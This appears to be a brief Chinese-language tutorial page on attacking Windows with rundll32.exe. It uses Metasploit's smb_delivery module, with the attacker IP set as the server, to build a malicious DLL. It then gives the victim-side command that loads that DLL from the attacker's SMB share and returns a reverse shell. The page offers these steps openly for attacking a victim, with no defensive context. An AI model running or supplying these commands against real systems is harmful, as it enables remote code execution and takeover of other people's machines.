rundll32.exe 攻擊

計算機網路計算機程式設計網路安全

Rundll32.exe 與 Windows 作業系統關聯，它允許你呼叫 16 位或 32 位 DLL 中匯出的函式，並將函式儲存在合適的記憶體庫中。

透過 SMB 發起 rundll32 攻擊

Metasploit 包含“SMB 投遞”模組，它生成惡意 dll 檔案。此模組透過 SMB 伺服器傳送 payload，並提供命令以檢索和執行生成的 payload。

生成 DLL payload

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(攻擊者 IP)
msf exploit(windows/smb/smb_delivery) > exploit

現在，你可以使用 rundll32.exe 在受害者機器上執行此生成的惡意 dll 檔案，然後在你的機器上獲取反向連線。

rundll32.exe \192.168.1.109\vabFG\test.dll,0

阿賈伊·亞達夫

更新於： 2020-09-23

564 次檢視

開啟你的職業生涯

完成課程即可獲得認證

開始

廣告

© . All rights reserved.